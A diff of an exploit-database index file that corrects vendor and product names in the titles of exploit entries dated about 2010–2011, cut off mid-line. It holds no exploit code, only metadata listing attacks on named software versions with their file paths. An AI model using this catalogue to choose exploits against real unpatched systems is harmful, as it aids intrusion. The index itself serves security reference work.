15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0 -15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 +15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 @@ -13485,7 +13485,7 @@ id,file,description,date,author,platform,type,port 15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",php,webapps,0 15488,platforms/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",php,webapps,0 -15489,platforms/windows/local/15489.py,"Mp3-Nator 2.0 - Buffer Overflow (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0 +15489,platforms/windows/local/15489.py,"MP3-Nator 2.0 - Buffer Overflow (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0 15491,platforms/osx/dos/15491.txt,"Apple Directory Services - Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - '.wav' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 @@ -13528,7 +13528,7 @@ id,file,description,date,author,platform,type,port 15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 15555,platforms/php/webapps/15555.txt,"Joomla! Component Maian Media (com_maianmedia) - SQL Injection",2010-11-16,v3n0m,php,webapps,0 15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0 -15558,platforms/multiple/dos/15558.html,"Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0 +15558,platforms/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0 15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15560,platforms/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15561,platforms/php/webapps/15561.txt,"CompactCMS 1.4.1 - SQL Injection",2010-11-16,"High-Tech Bridge SA",php,webapps,0 @@ -13555,7 +13555,7 @@ id,file,description,date,author,platform,type,port 15585,platforms/php/webapps/15585.txt,"Joomla! Component com_jimtawl - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0 16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0 15588,platforms/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 -15589,platforms/windows/local/15589.wsf,"Microsoft Windows Task Scheduler - Privilege Escalation",2010-11-20,webDEViL,windows,local,0 +15589,platforms/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - Cross-Site Scripting Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 @@ -13584,7 +13584,7 @@ id,file,description,date,author,platform,type,port 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 - Persistent Cross-Site Scripting",2010-11-30,"Shichemt Alen",php,webapps,0 15638,platforms/php/webapps/15638.txt,"Duhok Forum 1.1 - Arbitrary File Upload",2010-11-30,BrOx-Dz,php,webapps,0 -15639,platforms/php/webapps/15639.txt,"Pandora Fms 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15639,platforms/php/webapps/15639.txt,"Pandora FMS 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 15640,platforms/php/webapps/15640.txt,"Pandora Fms 3.1 - OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15641,platforms/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",windows,dos,0 @@ -13598,12 +13598,12 @@ id,file,description,date,author,platform,type,port 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15650,platforms/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 - SQL Injection",2010-12-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15651,platforms/php/webapps/15651.txt,"OsCSS 1.2 - Arbitrary File Upload",2010-12-01,"Shichemt Alen",php,webapps,0 -15653,platforms/asp/webapps/15653.txt,"bugtracker.net 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 +15653,platforms/asp/webapps/15653.txt,"BugTracker.NET 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 15654,platforms/php/webapps/15654.txt,"Digitalus 1.10.0 Alpha2 - Arbitrary File Upload",2010-12-01,eidelweiss,php,webapps,0 15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,windows,remote,0 15656,platforms/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 - Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps,0 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service",2010-12-02,h1ch4m,windows,dos,0 -15658,platforms/windows/remote/15658.rb,"Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0 +15658,platforms/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 - Cross-Site Scripting",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 @@ -13612,7 +13612,7 @@ id,file,description,date,author,platform,type,port 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Routers (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 -15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 +15668,platforms/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 @@ -13738,7 +13738,7 @@ id,file,description,date,author,platform,type,port 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps,0 -15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution",2010-12-22,WooYun,windows,remote,0 +15809,platforms/windows/remote/15809.html,"Microsoft WMITools ActiveX - Remote Command Execution",2010-12-22,WooYun,windows,remote,0 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps,0 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds - SQL Injection",2010-12-23,Br0ly,php,webapps,0 @@ -13826,7 +13826,7 @@ id,file,description,date,author,platform,type,port 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 -15936,platforms/windows/local/15936.py,"VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0 +15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,php,webapps,0 15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,php,webapps,0 @@ -14107,7 +14107,7 @@ id,file,description,date,author,platform,type,port 16293,platforms/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization Exploit (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank 'file://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple Mac OSX iTunes 8.1.1 - ITms Overflow (Metasploit)",2010-11-11,Metasploit,osx,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple iTunes 8.1.1 (Mac OSX) - ITms Overflow (Metasploit)",2010-11-11,Metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java - Statement.invoke() Trusted Method Chain Exploit (Metasploit)",2010-12-15,Metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Mozilla Firefox 3.5 - escape() Return Value Memory Corruption (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 @@ -14118,28 +14118,28 @@ id,file,description,date,author,platform,type,port 16304,platforms/multiple/remote/16304.rb,"Opera historysearch - Cross-Site Scripting (Metasploit)",2010-11-11,Metasploit,multiple,remote,0 16305,platforms/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation (Metasploit)",2010-09-27,Metasploit,multiple,remote,0 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 +16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 16309,platforms/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,Metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,Metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String (Metasploit)",2010-11-30,Metasploit,linux,remote,0 16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0 -16314,platforms/multiple/remote/16314.rb,"Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 +16314,platforms/multiple/remote/16314.rb,"Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote,0 -16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 +16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote,0 16320,platforms/unix/remote/16320.rb,"Samba - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote,0 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - nttrans Buffer Overflow (Metasploit)",2010-04-28,Metasploit,linux,remote,0 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote,0 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote,0 -16324,platforms/multiple/remote/16324.rb,"Solaris sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote,0 +16324,platforms/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote,0 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind - adm_build_path() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,solaris,remote,0 16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution (Metasploit)",2010-07-25,Metasploit,solaris,remote,0 16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 -16328,platforms/solaris/remote/16328.rb,"Sun Solaris - Telnet Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 +16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba (Solaris) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0 16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit (Metasploit)",2010-06-22,Metasploit,windows,remote,0 @@ -14150,18 +14150,18 @@ id,file,description,date,author,platform,type,port 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16339,platforms/windows/remote/16339.rb,"Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote,0 -16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener - 'ARGUMENTS' Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 +16339,platforms/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote,0 +16340,platforms/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 - Long Filename Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP - Long Mode Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 - Transfer-Mode Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16346,platforms/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16347,platforms/windows/remote/16347.rb,"3Com TFTP Service (3CTftpSvc) - Long Mode Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16348,platforms/windows/remote/16348.rb,"Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 - Long Filename Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow (Metasploit)",2011-03-05,Metasploit,windows,remote,0 +16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)",2011-03-05,Metasploit,windows,remote,0 16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 @@ -14226,7 +14226,7 @@ id,file,description,date,author,platform,type,port 16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 -16415,platforms/windows/remote/16415.rb,"CA BrightStor - ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 +16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0 16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -14255,7 +14255,7 @@ id,file,description,date,author,platform,type,port 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 -16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,0 +16443,platforms/windows/remote/16443.rb,"Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)",2010-08-25,Metasploit,windows,remote,0 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,windows,remote,0 @@ -14273,33 +14273,33 @@ id,file,description,date,author,platform,type,port 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 +16465,platforms/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 -16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0 -16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2)",2010-06-22,Metasploit,windows,remote,0 +16473,platforms/windows/remote/16473.rb,"Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 +16474,platforms/windows/remote/16474.rb,"Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit)",2010-07-01,Metasploit,windows,remote,0 +16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16476,platforms/windows/remote/16476.rb,"Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16477,platforms/windows/remote/16477.rb,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2)",2010-06-22,Metasploit,windows,remote,0 16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP Subscribe Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16479,platforms/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer 